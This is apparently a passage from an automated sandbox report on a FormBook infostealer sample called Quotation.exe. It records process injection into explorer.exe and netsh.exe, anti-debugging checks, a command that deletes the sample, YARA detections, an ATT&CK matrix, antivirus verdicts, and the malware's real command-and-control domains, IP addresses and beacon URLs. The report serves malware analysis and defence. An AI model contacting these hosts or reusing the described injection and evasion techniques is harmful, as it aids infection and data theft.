          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348AD30 mov eax, dword ptr fs:[00000030h]8_2_0348AD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03493D34 mov eax, dword ptr fs:[00000030h]8_2_03493D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03538DF1 mov eax, dword ptr fs:[00000030h]8_2_03538DF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B1E1 mov eax, dword ptr fs:[00000030h]8_2_0348B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B1E1 mov eax, dword ptr fs:[00000030h]8_2_0348B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348B1E1 mov eax, dword ptr fs:[00000030h]8_2_0348B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]8_2_03482D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]8_2_03482D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]8_2_03482D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]8_2_03482D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03482D8A mov eax, dword ptr fs:[00000030h]8_2_03482D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034AC182 mov eax, dword ptr fs:[00000030h]8_2_034AC182
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BA185 mov eax, dword ptr fs:[00000030h]8_2_034BA185
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BFD9B mov eax, dword ptr fs:[00000030h]8_2_034BFD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BFD9B mov eax, dword ptr fs:[00000030h]8_2_034BFD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034B35A1 mov eax, dword ptr fs:[00000030h]8_2_034B35A1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351C450 mov eax, dword ptr fs:[00000030h]8_2_0351C450
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351C450 mov eax, dword ptr fs:[00000030h]8_2_0351C450
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A0050 mov eax, dword ptr fs:[00000030h]8_2_034A0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A0050 mov eax, dword ptr fs:[00000030h]8_2_034A0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03551074 mov eax, dword ptr fs:[00000030h]8_2_03551074
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03542073 mov eax, dword ptr fs:[00000030h]8_2_03542073
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A746D mov eax, dword ptr fs:[00000030h]8_2_034A746D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03554015 mov eax, dword ptr fs:[00000030h]8_2_03554015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03554015 mov eax, dword ptr fs:[00000030h]8_2_03554015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03507016 mov eax, dword ptr fs:[00000030h]8_2_03507016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03507016 mov eax, dword ptr fs:[00000030h]8_2_03507016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03507016 mov eax, dword ptr fs:[00000030h]8_2_03507016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541C06 mov eax, dword ptr fs:[00000030h]8_2_03541C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355740D mov eax, dword ptr fs:[00000030h]8_2_0355740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355740D mov eax, dword ptr fs:[00000030h]8_2_0355740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0355740D mov eax, dword ptr fs:[00000030h]8_2_0355740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]8_2_03506C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]8_2_03506C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]8_2_03506C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03506C0A mov eax, dword ptr fs:[00000030h]8_2_03506C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]8_2_0349B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]8_2_0349B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]8_2_0349B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B02A mov eax, dword ptr fs:[00000030h]8_2_0349B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BBC2C mov eax, dword ptr fs:[00000030h]8_2_034BBC2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]8_2_0351B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0351B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]8_2_0351B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]8_2_0351B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]8_2_0351B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0351B8D0 mov eax, dword ptr fs:[00000030h]8_2_0351B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03558CD6 mov eax, dword ptr fs:[00000030h]8_2_03558CD6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_035414FB mov eax, dword ptr fs:[00000030h]8_2_035414FB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03489080 mov eax, dword ptr fs:[00000030h]8_2_03489080
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03503884 mov eax, dword ptr fs:[00000030h]8_2_03503884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03503884 mov eax, dword ptr fs:[00000030h]8_2_03503884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C90AF mov eax, dword ptr fs:[00000030h]8_2_034C90AF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BF0BF mov ecx, dword ptr fs:[00000030h]8_2_034BF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BF0BF mov eax, dword ptr fs:[00000030h]8_2_034BF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BF0BF mov eax, dword ptr fs:[00000030h]8_2_034BF0BF
          Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.xyfs360.com
          Source: C:\Windows\explorer.exeDomain query: www.houseof2.com
          Source: C:\Windows\explorer.exeDomain query: www.clickqrcoaster.com
          Source: C:\Windows\explorer.exeDomain query: www.riceandginger.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.122 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.235.228.19 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80Jump to behavior
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73CA1000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_73CA1000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Users\user\Desktop\Quotation.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Quotation.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Quotation.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.241989429.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery241Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383984 Sample: Quotation.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 6 other signatures 2->42 10 Quotation.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\laegtoh4.dll, PE32 10->28 dropped 54 Detected unpacking (changes PE section rights) 10->54 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Contains functionality to prevent local Windows debugging 10->60 14 Quotation.exe 10->14         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 riceandginger.com 162.241.24.122, 49717, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 www.xyfs360.com 156.235.228.19, 49716, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Uses netsh to modify the Windows network and firewall settings 17->46 21 netsh.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Quotation.exe23%ReversingLabsWin32.Spyware.Noon

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll13%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.2.netsh.exe.2f15d18.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.Quotation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Quotation.exe.73ca0000.6.unpack100%AviraHEUR/AGEN.1131513Download File
          8.2.netsh.exe.398f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.Quotation.exe.1eb40000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Quotation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.clickqrcoaster.com/fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.riceandginger.com/fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.xyfs360.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG0%Avira URL Cloudsafe
          http://www.namebrightstatic.com/images/logo_off.gif)0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.riceandginger.com/fcn/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.houseof2.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          riceandginger.com
          		162.241.24.122
          		truetrue
            		unknown
            www.xyfs360.com
            		156.235.228.19
            		truetrue
              		unknown
              parkingpage.namecheap.com
              		198.54.117.216
              		truefalse
                		high
                houseof2.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.houseof2.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.riceandginger.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.clickqrcoaster.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.clickqrcoaster.com/fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDotrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.riceandginger.com/fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDotrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.xyfs360.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uGtrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.riceandginger.com/fcn/true
                        • Avira URL Cloud: safe
                        		low
                        http://www.houseof2.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/Vfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.NameBright.comnetsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.tiro.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
